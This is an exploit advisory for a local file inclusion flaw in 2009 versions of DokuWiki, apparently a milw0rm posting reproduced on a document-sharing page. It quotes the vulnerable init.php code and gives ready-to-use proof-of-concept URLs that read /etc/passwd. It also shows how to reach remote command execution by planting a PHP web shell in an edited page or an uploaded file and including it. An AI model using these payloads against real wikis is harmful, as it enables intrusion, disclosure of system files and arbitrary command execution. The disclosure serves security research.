Loading ...
Global Do...
News & Politics
65
0
Try Now
Log In
Pricing
1 # Author_ girex 2 # Homepage_ girex.altervista.org 3 4 # CMS_ Dokuwiki 5 # Homepage_ dokuwiki.org 6 7 # Affected versions_ 2009−02−14 8 rc2009−02−06 9 rc2009−01−30 10 11 # Bug_ Local file inclusion 12 # Need_ register_globals = On 13 14 15 # Vuln description_ 16 # File: /inc/init.php 17 18 // if available load a preload config file 19 $preload = fullpath(dirname(__FILE__)).’/preload.php’; 20 if (@file_exists($preload)) include($preload); 21 22 ... 23 24 //set the configuration cascade − but only if its not already been set in preload.php 25 global $config_cascade; 26 if (empty($config_cascade)) { 27 $config_cascade = array( 28 ’main’ => array( 29 ’default’ => array(DOKU_CONF.’dokuwiki.php’), 30 ’local’ => array(DOKU_CONF.’local.php’), 31 ’protected’ => array(DOKU_CONF.’local.protected.php’), 32 ), 33 34 ... 35 36 // load the global config file(s) 37 foreach (array(’default’,’local’,’protected’) as $config_group) { 38 if (empty($config_cascade[’main’][$config_group])) continue; 39 foreach ($config_cascade[’main’][$config_group] as $config_file) { 40 if (@file_exists($config_file)) { 41 include($config_file); 42 } 43 } 44 } 45 46 47 # File preload.php doesn’t exists. (so seems for the affected versions) 48 # So we can set $config_cascade arrays via register globals 49 # It’s not a RFI couse use of file_exists function. 50 51 # First of all you can check the dokuwiki’s version here: 52 # /[host]/[path]/VERSION Page 1/2 Dokuwiki 20090214 Local File Inclusion Vulnerability girex 05/26/2009 53 # and check if it’s a vulnerable version 54 55 # PoC: [host]/[path]/doku.php?config_cascade[main][default][]=/etc/passwd 56 # PoC: [host]/[path]/doku.php?config_cascade[main][default][]=./README 57 58 # Note: 59 # You can obtain a remote command execution if you can edit the content of a page 60 # Just insert your php code into it like: <?php system($_GET[cmd]); ?> 61 # And include it: 62 63 # PoC: [host]/[path]/doku.php?config_cascade[main][default][]=./data/pages/[page_edited].txt 64 65 # Or you can check if you have permissions to upload file via: 66 # [host]/[path]/lib/exe/mediamanager.php 67 68 # If so, upload your file with .doc extension then include it: 69 70 # PoC: [host]/[path]/doku.php?config_cascade[main][default][]=./data/media/[uploaded_file].doc 71 72 # milw0rm.com [2009−05−26] Page 2/2 Dokuwiki 20090214 Local File Inclusion Vulnerability girex 05/26/2009
